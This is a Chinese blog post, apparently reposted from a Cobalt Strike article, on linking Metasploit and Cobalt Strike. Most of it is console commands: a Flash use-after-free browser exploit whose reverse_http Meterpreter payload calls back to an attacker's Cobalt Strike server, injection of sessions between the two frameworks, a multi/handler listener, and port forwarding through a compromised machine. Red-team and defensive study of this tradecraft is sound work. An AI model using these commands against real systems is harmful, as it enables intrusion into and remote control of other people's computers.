• Cobalt Strike 和 Metasploit Framework 联动


    文章来源:https://blog.cobaltstrike.com/2016/01/05/interoperability-with-the-metasploit-framework/


    MSF通过漏洞利用使得CS获得shell:

    use exploit/multi/browser/adobe_flash_hacking_team_uaf
    set PAYLOAD windows/meterpreter/reverse_http
    set LHOST [Cobalt Strike's IP or hostname]
    set LPORT 80
    set DisablePayloadHandler True
    set PrependMigrate True
    exploit -j
    对上面命令的说明:
    1.选择漏洞利用模块
    2.选择对应的payload。这里的Payload是要给CS的,所以只能选择CS所拥有的模块,如reverse_http或者reverse_https。需要和CS一致
    3.设置LHOSTLPORT设置为Cobalt Strike的IP和监听端口当Cobalt Strike收到Metasploit Framework请求时,会自动处理
    4.DisablePayloadHandler设置为True。这告诉Metasploit框架,不需要在Metasploit框架来连接Payload
    5.PrependMigrate设置为True。Metasploit框架在利用成功后,会立刻迁移到另一个进程。此选项对于客户端攻击非常重要。如果被利用的应用程序崩溃或关闭,它可使您的会话继续存在。

    将Meterpreter shell 分享给 Cobalt Strike :
    use exploit/windows/local/payload_inject
    set PAYLOAD windows/meterpreter/reverse_http
    set LHOST [IP address of compromised system]
    set LPORT 80
    set SESSION 1
    set DisablePayloadHandler True
    exploit -j
    对上面命令的说明:

    1.使用exploit/windows/local/payload_inject模块

    2. 对于HTTP Beacon,PAYLOAD设置为windows/meterpreter/reverse_http 或者 windows/meterpreter/reverse_https ,需要和CS一致

    3.设置LHOSTLPORT指向您的Cobalt Strike侦听器。

    4.将DisablePayloadHandler设置为True。

    5.将SESSION设置为Meterpreter会话的会话ID


    将CS的shell分享给MSF:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [IP address of compromised system]
    set LPORT 8443
    set ExitOnSession False
    exploit -j

    PS:经过测试,只有 windows/meterpreter/reverse_tcp 可以用,http和https用不起,不知道什么原因

    MSF设置完毕之后,需要在CS设置监听器,Payload选择foreign,端口和IP选择MSF监听端口和IP。随后在图形界面选择需要分享的shell,邮件单击【spawn】,就可以了


    rportfwd 4444 远程主机IP 3333】:这个命令将在肉鸡中新建4444监听端口,然后转发给远程主机中的3333端口

  • 相关阅读:
    USACO Sabotage
    USACO Telephone Lines
    NOIP 2012 借教室
    洛谷 P1902 刺杀大使
    VIJOS-P1450 包裹快递
    JDOJ 1770 埃及分数
    USACO Monthly Expense
    7.modifier插件的自定义和使用
    6.function自定义插件的方法和使用
    5.Smart使用内置函数或者自定义函数
  • 原文地址:https://www.cnblogs.com/blogs-1024/p/13304208.html
Copyright © 2020-2023  润新知